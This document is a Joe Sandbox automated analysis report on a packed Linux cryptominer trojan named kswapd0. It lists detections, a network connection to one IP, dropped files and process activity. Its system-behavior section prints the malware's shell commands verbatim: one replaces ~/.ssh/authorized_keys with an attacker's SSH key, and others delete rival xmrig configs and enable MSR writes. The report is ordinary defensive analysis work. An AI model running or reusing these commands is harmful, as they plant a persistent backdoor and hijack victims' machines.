Linux
Analysis Report
kswapd0
Overview
General Information
Sample Name: | kswapd0 |
Analysis ID: | 1312722 |
MD5: | 92ebbacccf23ef998d99635a2b670e43 |
SHA1: | 55af994c3d877c68d35df2873d2b88f58c22e11d |
SHA256: | 56edefa58b141d1c8dc88b235629b0cce6e47d61a21b0bc24289dd9cc9227fa2 |
Infos: |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox Version: | 38.0.0 Beryl |
Analysis ID: | 1312722 |
Start date and time: | 2023-09-22 05:39:08 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) |
Analysis Mode: | default |
Sample file name: | kswapd0 |
Detection: | MAL |
Classification: | mal80.troj.evad.mine.lin@0/4@0/0 |
Command: | /tmp/kswapd0 |
PID: | 4697 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | chattr: No such file or directory while trying to stat /home/james/.xmrig.json sh: 1: lockr: not found chattr: No such file or directory while trying to stat /home/james/.config/xmrig.json sh: 1: lockr: not found |
- system is lnxubuntu1
- kswapd0 New Fork (PID: 4706, Parent: 4697)
- sh New Fork (PID: 4707, Parent: 4706)
- sh New Fork (PID: 4708, Parent: 4706)
- sh New Fork (PID: 4723, Parent: 4706)
- kswapd0 New Fork (PID: 4731, Parent: 4697)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Linux_Trojan_Pornoasset_927f314f | unknown | unknown |
|
- • AV Detection
- • Bitcoin Miner
- • Networking
- • System Summary
- • Data Obfuscation
- • Persistence and Installation Behavior
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Lowering of HIPS / PFW / Operating System Security Settings
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | MSR open for writing: | Jump to behavior |
Source: | Stderr: |
Source: | Modprobe: | Jump to behavior |
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior |
Source: | Reads CPU info from proc file: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Matched rule: |
Source: | Program segment: |
Source: | Matched rule: |
Source: | Classification label: |
Data Obfuscation |
---|
Source: | String containing UPX found: | ||
Source: | String containing UPX found: | ||
Source: | String containing UPX found: |
Persistence and Installation Behavior |
---|
Source: | File: | Jump to behavior |
Source: | Mkdir executable: | Jump to behavior |
Source: | Reads from proc file: | Jump to behavior | ||
Source: | Reads from proc file: | Jump to behavior | ||
Source: | Reads from proc file: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior |
Source: | Directory: | Jump to behavior |
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Stderr: chattr: No such file or directory while trying to stat /home/james/.xmrig.jsonsh: 1: lockr: not foundchattr: No such file or directory while trying to stat /home/james/.config/xmrig.jsonsh: 1: lockr: not found: |
Source: | Submission file: |
Source: | Modprobe: | Jump to behavior |
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior | ||
Source: | Reads CPU info from /sys: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Reads CPU info from proc file: | Jump to behavior |
Source: | Args: | Jump to behavior | ||
Source: | Args: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Scripting | 1 Kernel Modules and Extensions | 1 Kernel Modules and Extensions | 3 File and Directory Permissions Modification | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Hidden Files and Directories | Security Account Manager | 23 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Obfuscated Files or Information | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
19% | ReversingLabs | Linux.Coinminer.BitCoinMiner | ||
100% | Joe Sandbox ML |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
179.43.139.82 | unknown | Panama | 51852 | PLI-ASCH | false |
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 389 |
Entropy (8bit): | 5.91239652812259 |
Encrypted: | false |
SSDEEP: | 12:4c1kSs8+BGm8/zAbN+Ms57FTPEGXMnouG:RuDRO/ERnsrPEI8q |
MD5: | A420F7A60A40F3FF3A806A01FEB1DFDA |
SHA1: | 1AE65132B036DE51BCC62F66B51AE362E11182AF |
SHA-256: | A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2 |
SHA-512: | 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/kswapd0 |
File Type: | |
Category: | dropped |
Size (bytes): | 3 |
Entropy (8bit): | 1.584962500721156 |
Encrypted: | false |
SSDEEP: | 3:Odn:Od |
MD5: | 76DC611D6EBAAFC66CC0879C71B5DB5C |
SHA1: | B4182BFF4B3CF75F9E54F4990F9BD153C0C2973C |
SHA-256: | 2747B7C718564BA5F066F0523B03E17F6A496B06851333D2D59AB6D863225848 |
SHA-512: | E2BC8CA53E630757EF4A3E8F3D0FC48AAC10A66DBE6D14D759D00C21263F4C0623F6841DC3995081F97EFF9641EA9BE42C9219F66E6C5B9EA9EFFA1C8450C3FB |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/kswapd0 |
File Type: | |
Category: | dropped |
Size (bytes): | 964 |
Entropy (8bit): | 5.9723721306121975 |
Encrypted: | false |
SSDEEP: | 24:LrcFXM+/mXYI4W6Q1JbDX1HaJGkff+fn0hoRa4UlgNsNCGbU66KLJ:LrcRWpLV6cEGPHZUKNo1 |
MD5: | 97164748DA3F82C5D74A0948140AAF97 |
SHA1: | A8E703F26AB2403C34AD53E02C215EB846995C9F |
SHA-256: | 3B57AF761EDCB31C8D95E857F4FF9E94BC6D7415CFDEA4CAC77D427B07BA5D30 |
SHA-512: | 1437A43E91DAFD4F3A09F2EC98534689E35848E88605227A8810E76EB0C102468E401E3116758965E0975BF3F08384CF5E98F0BD5D1EB0CFDDB38AAC15EEA793 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/kswapd0 |
File Type: | |
Category: | dropped |
Size (bytes): | 1704 |
Entropy (8bit): | 6.022324673206885 |
Encrypted: | false |
SSDEEP: | 48:Lrjv1aRgZIt/nz5k3GIvxhBliwmQ+0paswfFFXSH:Lrr9Z0zK3GIvx8wM0KfzX2 |
MD5: | 66A44D121393393383280491BEF76956 |
SHA1: | 4299A3D437E23DFAAC80309CC7D145665363C06A |
SHA-256: | A4BEA9837A94392E28B8F6E355D5119E3E1C243A1BDAF2A06CBE6B7300C017BE |
SHA-512: | 837299BF3912A190CE3BA04CFAD6C452D67F891C1E928447705A5562128B50BF6A7FD9572A610B3E704F849E02AACAC09E243492CFC0B87F713ADA94187B84AF |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 7.946128125291084 |
TrID: |
|
File name: | kswapd0 |
File size: | 2'225'356 bytes |
MD5: | 92ebbacccf23ef998d99635a2b670e43 |
SHA1: | 55af994c3d877c68d35df2873d2b88f58c22e11d |
SHA256: | 56edefa58b141d1c8dc88b235629b0cce6e47d61a21b0bc24289dd9cc9227fa2 |
SHA512: | 8deb0952d0061dc55d728a6923e4f7e12b6ca670800070e604cb6ac996391eb31738b39938400b985cf9187a7a0320827d27da43810b09cf958a44a633069b3e |
SSDEEP: | 49152:7NcjlR90c88OeWSUiyLspBFLKb52pzTduYRpKHcVUgcgl:xWPQheWvi9TKV29Tdo8VUgJl |
TLSH: | 0CA533B0B04DE7B3A347BB6DA776A1A02C9E12201FCFA8A5D55C3C12FE781E54653136 |
File Content Preview: | .ELF..............>.....H.a.....@...................@.8...@.......................@.......@.......!.......!...............................b.......b.............x.D.............Q.td....................................................6;..UPX!l........F]..F] |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 64 |
Program Header Offset: | 64 |
Program Header Size: | 56 |
Number of Program Headers: | 3 |
Section Header Offset: | 0 |
Section Header Size: | 64 |
Number of Section Headers: | 0 |
Header String Table Index: | 0 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0x21f2a5 | 0x21f2a5 | 7.9462 | 0x5 | R E | 0x1000 | ||
LOAD | 0x0 | 0x620000 | 0x620000 | 0x0 | 0x44d078 | 0.0000 | 0x6 | RW | 0x1000 | ||
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x10 |
Download Network PCAP: filtered – full
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 22, 2023 05:39:44.454972029 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:44.759388924 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:44.759665966 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:44.760174990 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:45.064629078 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:45.078490973 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:45.078556061 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:45.078922987 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:45.078922987 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:45.097338915 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:45.414565086 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:45.415395975 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:39:45.719887972 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:39:45.759593010 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:40:45.719552994 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:40:46.024297953 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:40:46.470103979 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:40:46.774687052 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:40:46.774900913 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:41:34.994158983 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:41:35.298751116 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:41:35.298871040 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:42:06.782044888 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:42:07.086853027 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:42:07.087122917 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:43:07.175693035 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:43:07.480571985 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:43:07.607974052 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Sep 22, 2023 05:43:07.913011074 CEST | 80 | 50188 | 179.43.139.82 | 192.168.2.20 |
Sep 22, 2023 05:43:07.913373947 CEST | 50188 | 80 | 192.168.2.20 | 179.43.139.82 |
Session ID | Source IP | Source Port | Destination IP | Destination Port |
---|---|---|---|---|
0 | 192.168.2.20 | 50188 | 179.43.139.82 | 80 |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Sep 22, 2023 05:39:44.760174990 CEST | 0 | OUT | |
Sep 22, 2023 05:39:45.078490973 CEST | 1 | IN | |
Sep 22, 2023 05:39:45.078556061 CEST | 2 | IN | |
Sep 22, 2023 05:39:45.097338915 CEST | 2 | OUT | |
Sep 22, 2023 05:39:45.414565086 CEST | 3 | IN | |
Sep 22, 2023 05:39:45.415395975 CEST | 3 | OUT | |
Sep 22, 2023 05:39:45.719887972 CEST | 4 | IN | |
Sep 22, 2023 05:40:46.470103979 CEST | 4 | OUT | |
Sep 22, 2023 05:40:46.774687052 CEST | 4 | IN | |
Sep 22, 2023 05:41:34.994158983 CEST | 5 | OUT | |
Sep 22, 2023 05:41:35.298751116 CEST | 5 | IN | |
Sep 22, 2023 05:42:06.782044888 CEST | 5 | OUT | |
Sep 22, 2023 05:42:07.086853027 CEST | 5 | IN | |
Sep 22, 2023 05:43:07.607974052 CEST | 6 | OUT | |
Sep 22, 2023 05:43:07.913011074 CEST | 6 | IN |
System Behavior
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /tmp/kswapd0 |
Arguments: | /tmp/kswapd0 |
File size: | 2225356 bytes |
MD5 hash: | 92ebbacccf23ef998d99635a2b670e43 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /tmp/kswapd0 |
Arguments: | - |
File size: | 2225356 bytes |
MD5 hash: | 92ebbacccf23ef998d99635a2b670e43 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/rm |
Arguments: | rm -rf .ssh |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/mkdir |
Arguments: | mkdir .ssh |
File size: | 76848 bytes |
MD5 hash: | a97f666f21c85ec62ea47d022263ef41 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/chmod |
Arguments: | chmod -R go= /home/james/.ssh |
File size: | 56112 bytes |
MD5 hash: | 32c8c7318223ebc5b934a78cfc153d6f |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /tmp/kswapd0 |
Arguments: | - |
File size: | 2225356 bytes |
MD5 hash: | 92ebbacccf23ef998d99635a2b670e43 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json" |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /usr/bin/chattr |
Arguments: | chattr -ia /home/james/.xmrig.json |
File size: | 10592 bytes |
MD5 hash: | 8aa970e89963faf71434e3a37222cc49 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/rm |
Arguments: | rm -rf /home/james/.xmrig.json |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /usr/bin/chattr |
Arguments: | chattr -ia /home/james/.config/xmrig.json |
File size: | 10592 bytes |
MD5 hash: | 8aa970e89963faf71434e3a37222cc49 |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/rm |
Arguments: | rm -rf /home/james/.config/xmrig.json |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
Start time (UTC): | 03:39:43 |
Start date (UTC): | 22/09/2023 |
Path: | /tmp/kswapd0 |
Arguments: | - |
File size: | 2225356 bytes |
MD5 hash: | 92ebbacccf23ef998d99635a2b670e43 |
Start time (UTC): | 03:39:44 |
Start date (UTC): | 22/09/2023 |
Path: | /tmp/kswapd0 |
Arguments: | - |
File size: | 2225356 bytes |
MD5 hash: | 92ebbacccf23ef998d99635a2b670e43 |
Start time (UTC): | 03:39:45 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1" |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:45 |
Start date (UTC): | 22/09/2023 |
Path: | /bin/sh |
Arguments: | - |
File size: | 4 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 03:39:45 |
Start date (UTC): | 22/09/2023 |
Path: | /sbin/modprobe |
Arguments: | /sbin/modprobe msr allow_writes=on |
File size: | 9 bytes |
MD5 hash: | 45c119a51c0bd3f057393c8ac51d00be |